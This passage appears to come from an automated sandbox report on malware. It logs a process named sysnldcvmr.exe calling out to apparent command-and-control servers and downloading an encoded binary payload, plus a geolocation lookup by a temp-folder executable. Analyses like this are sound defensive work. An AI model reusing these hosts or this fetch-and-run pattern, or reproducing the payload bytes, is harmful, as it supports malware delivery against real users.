                                                                                                                                                                                                                                                  Data Ascii: w'kioyg<^ FTAI93|tKRN2 &<R]G{|lL?Mg;~Idz7?:`XLN[:n|#]us0Wp+HH0=Px/lR6^wqej{P-c&o|"p)}h>H}exDyxNbn
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495760918 CET1236INData Raw: 7d 28 67 b2 35 31 cd e8 49 09 2a a8 7f 40 bb 75 b4 6e ad fe 3c 0a 84 26 89 76 15 12 72 b4 04 2c 66 31 e4 74 8f 5e d0 a5 c4 84 7d 8f 94 bb 11 ec 05 d7 49 cc bd f9 39 67 d2 4a 86 5d 7a 9c ae 55 3b 2f 15 68 53 e2 2b 20 9c 5c b8 f2 9c f5 d8 bf 81 46
                                                                                                                                                                                                                                                  Data Ascii: }(g51I*@un<&vr,f1t^}I9gJ]zU;/hS+ \FQ'vo-,1T]'Y5*\#;;dZpYQM7#s<Y_-2f?.iAgW%RmmjCGrs?BF4X^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495840073 CET1236INData Raw: 80 29 c3 1b 91 2c 56 75 94 50 da 12 a2 5c 9e 90 1d 9a 9f fe 26 ea a8 1f d1 b3 57 33 8f 35 74 48 82 da 6b 2d ea 8c c4 0a 58 7b 3b f9 a5 b2 68 c8 43 18 f6 b4 6e 69 26 15 28 df fc d4 4f 36 c5 93 ca 6f 8d 58 34 0c f5 53 01 78 2d 10 c6 2d 7c ca 9e 6b
                                                                                                                                                                                                                                                  Data Ascii: ),VuP\&W35tHk-X{;hCni&(O6oX4Sx--|kiW'TF;%.ExZ}_`S0q!0Nc9^EySD6`L0Gk{42BCWv6amV_?}"o_w#~_Pf.ym<-#jD*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495855093 CET1236INData Raw: 6d 99 87 9a de 95 6e d2 d5 cc 32 ae ca d7 b3 f6 eb 75 01 11 13 c8 5b 53 fc b7 b1 5f c9 89 fb b6 17 06 f9 3b 07 5a b3 b7 5c 73 8b f3 52 47 83 96 d9 bc 0a b3 37 35 89 38 17 df b7 91 93 b3 36 2d 6a 3d db 8b 22 cc 2d f2 ae 67 c2 2a c9 4a bc f1 70 3c
                                                                                                                                                                                                                                                  Data Ascii: mn2u[S_;Z\sRG7586-j="-g*Jp<&]2=.yp0SbdcHqH]T|1pX3t/I+.?h!7v?NJAE=oaT:O(sR*Au P+H~p2.X$I2
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.613574028 CET1236INData Raw: 5d ac b7 e5 06 c7 5a a4 2e 38 cb 22 48 51 15 6a 65 c1 e7 5c ee 9c 66 b3 22 30 c9 74 66 08 6d 3a d5 4c 0d 9e 44 de c1 3e e9 36 e2 75 1f 84 5e bb 7c b1 1d 6c 11 5b c4 39 88 5b cb cc ca fa bf c3 97 4b 5e 6e 40 5c 80 48 77 01 26 d3 b6 54 43 98 97 77
                                                                                                                                                                                                                                                  Data Ascii: ]Z.8"HQje\f"0tfm:LD>6u^|l[9[K^n@\Hw&TCw#b)[S~\I=G3ND]+i:yH>.!=l$pJsNZ$yy*=)X-GfX`PYr*Fo{[ffqGCT#'!#^ltJeBu


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.1149856178.237.33.50801852C:\Users\user\AppData\Local\Temp\2910625892.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:39.233906984 CET97OUTGET /json.gp?ip= HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: MSIE
                                                                                                                                                                                                                                                  Host: www.geoplugin.net
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:40.487355947 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  date: Thu, 05 Dec 2024 16:32:40 GMT
                                                                                                                                                                                                                                                  server: Apache
                                                                                                                                                                                                                                                  content-length: 963
                                                                                                                                                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                  cache-control: public, max-age=300
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.114986091.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:40.413906097 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:41.752402067 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:41 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:43.835342884 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:44.275445938 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:44 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:46.612999916 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:47.058316946 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:49.083053112 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:49.525414944 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:49 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:51.562633038 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:52.001179934 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:51 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.1149903185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:55.374587059 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.705826044 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:56 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.705948114 CET1236INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.705966949 CET1236INData Raw: 89 11 90 f0 30 5d 06 79 7d 11 91 53 a2 46 2a 99 af 89 be 89 c8 83 47 2f 5e ef 6a 87 f1 7c 3a df a2 02 bb a3 df d2 1f 3a 08 9d e6 63 5d dd e3 c8 b4 1a ad 2a 53 c5 97 64 d5 9b b7 66 cc 4b 9e c7 1a 33 07 e8 ac 25 da a7 84 91 1d 25 bd de 9a e6 f7 1a
                                                                                                                                                                                                                                                  Data Ascii: 0]y}SF*G/^j|::c]*SdfK3%%4vriY^~4w/'`3Wx0b/".4*AM0IjS#O'1V##+.jtts*sp4F9a0{W{+mF9_X#9`<`811
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.705979109 CET1236INData Raw: 1d be e3 38 fe 87 7e b5 6d 58 aa 5c 13 e6 a5 b7 77 a5 c8 43 39 e2 87 3a 9a d6 88 bd c1 a8 f5 24 83 23 a6 89 0d de 27 33 d7 55 67 b0 a9 0e 84 95 1d 85 2c 1d e0 b5 27 93 cb 6e db b1 78 8b c2 05 c1 16 93 b6 0f 53 d9 20 e5 88 aa c2 25 c4 f3 16 d3 1d
                                                                                                                                                                                                                                                  Data Ascii: 8~mX\wC9:$#'3Ug,'nxS %kU0]P>/DO\)#B+w~GkumhhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\ep
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.705990076 CET1236INData Raw: 2f d2 b0 3f e0 39 9a 07 57 31 bc fd 0e 71 99 76 58 86 49 b0 90 52 15 84 2c 37 30 4e 73 a1 ca 93 3d 29 c7 b9 aa 3f 97 61 0f a3 a5 e1 dc 06 ec 8d 7f 52 6d 54 b5 79 ff eb 4b 04 ec 05 bd cd 2c 34 02 21 8b 77 e6 70 c0 d6 2f be 36 de 14 26 aa db 2a b7
                                                                                                                                                                                                                                                  Data Ascii: /?9W1qvXIR,70Ns=)?aRmTyK,4!wp/6&*_C2kYO~6~hcah\(W"hY$4C$fjz0nqh:~rfrN1Vx1qn>5T M .A'=+<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.706001997 CET1236INData Raw: f5 33 7e 51 d0 1d 0a cc 3f c9 2e 84 8f 1f 47 7d e2 6d e2 1a 0f f8 27 13 14 59 b3 46 45 33 ef f4 67 df eb e0 59 ff 29 b1 ea 12 c8 d9 b4 d1 af e6 9a fb a4 ba 80 a7 30 c6 d1 c0 f6 10 d3 09 45 64 60 be e2 7c cb 6d ea 76 2f 1b 4e e8 b1 98 dc 7f 2e b1
                                                                                                                                                                                                                                                  Data Ascii: 3~Q?.G}m'YFE3gY)0Ed`|mv/N.bT3>r_qaE~=1u,Ok['HJyp[+"22?!s8:8Lb|BQEdqN96>7:WtKtrXl2CDFcu~ZZqrD-#l}E&Q
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:56.706013918 CET776INData Raw: 37 36 14 ef 30 ee f8 f2 f4 b1 32 98 51 9c 01 31 ae e5 14 0d d7 4f dc 08 c1 ff d0 f6 0c b9 ba 36 ce 8c 81 ed ae 51 2e 2d dd 11 21 52 a2 c6 ae 9a 19 04 42 88 fd f9 34 22 97 f2 66 93 e9 57 03 52 d5 56 9d b9 33 43 49 36 e9 35 df e2 f0 f5 c6 9b b5 78
                                                                                                                                                                                                                                                  Data Ascii: 7602Q1O6Q.-!RB4"fWRV3CI65x`3$Tg^:F=nlX,#~4?^./1OV&}S5x8>mw{iQr8!XUfG.p2"3PoG%X@3|_M|7
